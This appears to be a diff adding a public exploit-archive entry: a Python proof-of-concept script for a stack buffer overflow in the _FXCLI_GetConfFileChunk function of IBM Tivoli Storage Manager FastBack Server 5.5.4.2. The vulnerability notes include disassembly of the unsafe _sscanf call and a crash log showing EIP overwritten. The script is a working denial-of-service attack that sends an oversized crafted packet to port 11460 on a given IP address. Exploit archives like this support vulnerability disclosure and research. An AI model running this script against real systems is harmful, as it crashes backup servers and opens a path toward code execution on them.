if __name__ == "__main__":
main()

115
platforms/windows/dos/38980.py Executable file
View file

@ -0,0 +1,115 @@
#!/usr/bin/python
#
################################################################################
#
# Title: IBM Tivoli Storage Manager FastBack Server 5.5.4.2
# _FXCLI_GetConfFileChunk Stack Buffer Overflow Vulnerability
# Date: 14 December 2015
# Author: Gianni Gnesa (gnix)
#
# Vendor Homepage: http://www.ibm.com/
# Software Name: IBM Tivoli Storage Manager FastBack
# Software Version: 5.5.4.2 (x86)
# Software Link: - Go to https://www-01.ibm.com/marketing/iwm/tnd/search.jsp?pn=Tivoli+Storage+Manager
# - Select "IBM Tivoli Storage Manager FastBack Try-and-Buy"
# (Version 5.5.4.2, Size: 120.7 MB)
#
# Tested on: Windows 7 Professional (x86)
#
################################################################################
#
# Vulnerability:
# ==============
#
# The vulnerability is a stack buffer overflow in the _FXCLI_GetConfFileChunk
# function caused by the insecure usage of _sscanf while parsing user-controlled
# input.
#
# .text:0057898E lea eax, [ebp+var_210]
# .text:00578994 push eax
# .text:00578995 lea ecx, [ebp+var_108]
# .text:0057899B push ecx
# .text:0057899C lea edx, [ebp+var_20C]
# .text:005789A2 push edx
# .text:005789A3 lea eax, [ebp+var_4]
# .text:005789A6 push eax
# .text:005789A7 lea ecx, [ebp+var_104] <=== Buffer that will be overwritten
# .text:005789AD push ecx
# .text:005789AE push offset $SG128635 ; "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d"
# .text:005789B3 mov edx, [ebp+Src]
# .text:005789B6 push edx ; Src <=== Buffer under our control
# .text:005789B7 call _sscanf <=== Stack Buffer Overflow!!!
#
################################################################################
#
# Crash:
# ======
#
# (b44.9dc): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=01cd4fb8 ecx=01dacf8c edx=776870b4 esi=01cd4fb8 edi=00000000
# eip=41414141 esp=01dae328 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 41414141 ?? ???
#
################################################################################
import sys
import time
import socket
from struct import pack
def create_pkt(opcode, p1="", p2="", p3=""):
# psAgentCommand (0x30 bytes)
buf = "\x44" * 0xC
buf+= pack("<L", opcode) # opcode
buf+= pack("<i", 0x0) # 1st memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p1)) # 1st memcpy: size field
buf+= pack("<i", len(p1)) # 2nd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p2)) # 2nd memcpy: size field
buf+= pack("<i", len(p1) + len(p2)) # 3rd memcpy: offset (in psCommandBuffer.data) for Src field
buf+= pack("<i", len(p3)) # 3rd memcpy: size field
buf+= "\x44\x44\x44\x44"
buf+= "\x44\x44\x44\x44"
# psCommandBuffer
buf+= p1
buf+= p2
buf+= p3
# buf len - 4 because the packet length is not included
buf = pack(">i", len(buf)-4) + buf
return buf
def main():
if len(sys.argv) != 2:
print "Usage: %s <ip_address>\n" % sys.argv[0]
sys.exit(1)
server = sys.argv[1]
port = 11460
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, port))
pkt = create_pkt( opcode=0x531,
p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % ("A"*10000,0,0,0,0),
p2 = "B" * 24000,
p3 = "C" * 24000 )
s.send(pkt)
s.close()
print "[+] Packet sent."
sys.exit(0)
if __name__ == "__main__":
main()